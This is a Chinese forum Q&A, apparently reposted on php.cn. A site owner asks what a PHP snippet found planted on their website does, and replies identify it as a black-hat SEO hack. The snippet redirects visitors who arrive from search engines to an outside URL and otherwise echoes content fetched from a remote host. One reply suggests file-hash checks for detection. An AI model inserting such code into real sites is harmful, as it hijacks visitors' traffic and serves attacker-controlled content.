请教这段代码是做什么用的

WBOY
發布: 2016-06-13 13:31:52
原創
953 人瀏覽過

请问这段代码是做什么用的?

PHP code
<!--

Code highlighting produced by Actipro CodeHighlighter (freeware)
http://www.CodeHighlighter.com/

-->

<?php error_reporting(0);
header("content-Type: text/html; charset=gb2312");
function isSpider($v)
{
        $spiders=array("baidu.com/","google.com","so");
        $i=0;
        foreach ($spiders as $i => $value) {
            if(stristr($v,$spiders[$i])){return true;}
        }
        return false;
}
    if(isSpider($_SERVER['HTTP_REFERER']))
    {
    Header("Location: ".'http://park.jeanswest.com.cn/news/cache/url/php/zx.php?wanma='.$_SERVER['SERVER_NAME']);
        exit;
    }
echo file_get_contents('http://zhanyou.xilu.com/data/temp/baidu/zx/zx.php');
?>

登入後複製


这是被挂在网站上的。

------解决方案--------------------
判断是否是从baidu.com/","google.com","so" 三个页面进来的。如果是则跳转........,否则执行下面的file_get_contents();
------解决方案--------------------
当前黑帽SEO优化手法,劫持了你百度和谷歌来路的流量。
------解决方案--------------------
被黑了吧。。

做一个功能
来个md5_file文件检查记录。
下次再md5_file对比判断。
相關標籤:
來源:php.cn
本網站聲明
本文內容由網友自願投稿,版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容,請聯絡admin@php.cn
熱門教學
更多>
最新下載
更多>
網站特效
網站源碼
網站素材
前端模板